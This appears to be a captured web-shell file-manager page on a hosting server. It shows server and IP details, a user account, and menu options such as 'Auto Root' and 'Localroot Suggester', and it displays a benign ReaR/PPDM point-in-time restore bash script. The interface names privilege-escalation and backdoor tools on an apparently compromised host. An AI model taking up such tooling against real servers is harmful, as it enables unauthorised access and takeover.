Linux ih01.iridiumhosting.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.202
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
verify /
PPDM /
default /
Delete
Unzip
Name
Size
Permission
Date
Action
390_check_for_running_ppdm_agent_service.sh
303
B
-rw-r--r--
2026-04-01 09:39
400_check_and_wait_for_valid_lockbox.sh
2.83
KB
-rw-r--r--
2026-04-01 09:39
405_request_point_in_time_restore_parameters.sh
2.18
KB
-rw-r--r--
2026-04-01 09:39
410_find_backup_sets.sh
6.55
KB
-rw-r--r--
2026-04-01 09:39
Save
Rename
# Ask for point in time to recover with PPDM. if [[ "$PPDM_RESTORE_PIT" ]]; then LogPrint "Using $PPDM_RESTORE_PIT from configuration for point in time restore" return fi UserOutput "PPDM restores by default the latest backup data." UserOutput "Press only ENTER to restore the most recent available backup." UserOutput "Alternatively specify date and optionally time for Point-In-Time restore." UserOutput "Specifying only a date means to take the last backups from that day." UserOutput "" local answer= valid_date_and_time_input= ppdm_restore_pit_date= ppdm_restore_pit_time= # Let the user enter date and time again and again until the input is valid # or the user pressed only ENTER to restore the most recent available backup: while true; do answer=$(UserInput -I PPDM_RESTORE_PIT -r -p "Enter date/time (YYYY-MM-DD [HH[:MM[:SS]]]) or press ENTER for latest backup") # When the user pressed only ENTER leave this script to restore the most recent available backup: if test -z "$answer"; then UserOutput "Skipping PPDM Point-In-Time restore, will restore most recent backup." PPDM_RESTORE_PIT=$(date +"%Y-%m-%d %T") # set "now" as PIT time if not set return fi # Try to do TSM Point-In-Time restore provided the user input is valid date and time: valid_date_and_time_input="yes" # Validate date: ppdm_restore_pit_date=$(date -d "$answer" +%Y-%m-%d) || valid_date_and_time_input="no" # Validate time: ppdm_restore_pit_time=$(date -d "$answer" +%T) || valid_date_and_time_input="no" # replace time of 00:00:00 with 23:59:59 because a user giving only a date means "any backup from that day" [[ "$ppdm_restore_pit_time" == "00:00:00" ]] && ppdm_restore_pit_time="23:59:59" # Exit the while loop when the user input is valid date and time: is_true $valid_date_and_time_input && break # Show the user that his input is invalid and do the the while loop again: LogPrintError "Invalid date and/or time '$answer' specified, please try again." done PPDM_RESTORE_PIT="$ppdm_restore_pit_date $ppdm_restore_pit_time" UserOutput "Restoring all PPDM assets from backup before $ppdm_restore_pit_date $ppdm_restore_pit_time (YYYY-MM-DD HH:MM:SS)"